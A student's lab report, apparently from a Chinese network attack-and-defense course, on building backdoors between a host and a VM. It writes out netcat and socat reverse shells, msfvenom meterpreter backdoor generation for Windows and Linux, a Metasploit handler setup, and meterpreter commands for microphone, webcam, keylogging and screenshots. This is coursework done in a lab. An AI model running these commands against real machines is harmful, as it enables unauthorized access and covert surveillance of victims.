20192430 2021-2022-2 《網路與系統攻防技術》實驗二實驗報告
一、實驗內容
(1)使用netcat獲取主機操作Shell,cron啟動某項任務
(2)使用socat獲取主機操作Shell, 任務計劃啟動
(3)使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
(4)使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
二、實驗過程
任務一
使用netcat獲取主機操作Shell,cron啟動某項任務
首先獲取主機ip地址以及虛擬機器ip地址
測試主機與虛擬機器之間的連通性(ping)
ncat.exe -l -p 8888 // win主機執行監聽指令
nc 192.168.1.172 8888 -e /bin/sh // linux反彈連線win主機指令
nc -l -p 8888 // linux主機執行監聽指令
ncat.exe -e cmd.exe 192.168.241.128 8888 // win主機反彈連線linux指令
工具測試完畢開始實驗目標:使用cron獲得反彈,新增反彈命令
使用ncat.exe監聽反彈資訊
任務二
使用socat獲取主機操作Shell, 任務計劃啟動
在任務計劃程式中建立任務,具體設定如圖
達到時間後會彈出視窗
不關閉視窗,在虛擬機器裡使用socat命令獲取主機shell
socat - tcp:192.168.1.172:1899
任務三
使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
建立後門程式
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.172 LPORT=1899 -f exe > 20192430xzc_backdoor.exe
建立結果如下
將後門程式通過ncat輸入輸出重定向傳輸到主機上
nc 192.168.1.172 1899 < 2019230xzc_backdoor.exe ncat -l -p 1899 -vv -w 3 > 20192430xzc_backdoor.exe
在虛擬機器中使用msfconsole指令開啟msf控制檯
進入監聽模組,設定攻擊載荷,地址號和埠號
use exploit/multi/handler // 進入監聽模組
set payload windows/meterpreter/reverse_tcp // 設定攻擊載荷
set LHOST 192.168.241.128 // 設定IP地址,與後門的LHOST保持一致
set LPORT 1899 // 設定埠號,與後門的LPORT保持一致
使用exploit開啟監聽,出現
# [*] Started reverse TCP handler on 192.168.241.128:1899
此時在主機執行後門程式,則可以獲得主機shell
任務四
(4)使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
record_mic//獲取音訊
這裡由於虛擬機器問題並未成功實現,詳見問題與解決
webcam_snap//獲取攝像頭許可權拍照
keyscan_start//記錄敲擊鍵盤的過程
keyscan_dump//讀取敲擊鍵盤的記錄
screenshot//獲取主機截圖
獲取提權結果
任務五
(5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
生成shellcode並注入
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.241.128 LPORT=1899 -x ./pwn20192430 -f elf > pwn20192430_00
進入msf控制檯,由於是針對linux的32位程式,故攻擊載荷變為
use exploit/multi/handler // 進入監聽模組
set payload linux/x86/meterpreter/reverse_tcp // 設定攻擊載荷
set LHOST 192.168.241.128 // 設定IP地址,與後門的LHOST保持一致
set LPORT 1899 // 設定埠號,與後門的LPORT保持一致
在另一個終端中執行程式,即可獲得Linux的shell許可權
三、問題及解決方案
- 問題1:傳輸後門程式時顯示目標計算機積極拒絕
- 問題1解決方案:多次重複之後成功,並未找到實際原因
-
問題2:嘗試提權時無法獲取音訊
-
問題2解決方案:在網上搜索之後並未解決,虛擬機器顯示無法開啟聲音裝置
-
問題3:任務五監聽時sesion不斷迴圈增加,並未找到原因
四、回答問題
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
部分網路資源安裝包捆綁下載
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
網路協議的捆綁自啟動或者軟體中設定後門自啟動
(3)Meterpreter有哪些給你映像深刻的功能?
非常便捷的生成後門程式,獲取主機的一系列許可權
(4)如何發現自己有系統有沒有被安裝後門?
檢查是否有不常用的ip連線或者埠持續開放
五、學習感悟、思考等
本次實驗學習了反彈連結與後門程式獲取許可權,在實驗中遇到很多問題,但是在同學和老師的幫助下解決了大部分,對於後門程式也有了實踐方面的瞭解,希望今後還能繼續完善這方面的知識,理論與實踐相互促進.
雖然現在的我僅僅只是瞭解後門的基本原理,掌握了最基本的後門的生成、投送、啟動,但有了現在的基礎,一步步循序漸進,我會學到更深入的知識,也認識到系統防範入侵的能力很低,在以後工作學習中應注意安全防護。
最後感謝老師和同學對於實驗問題的解答與幫助。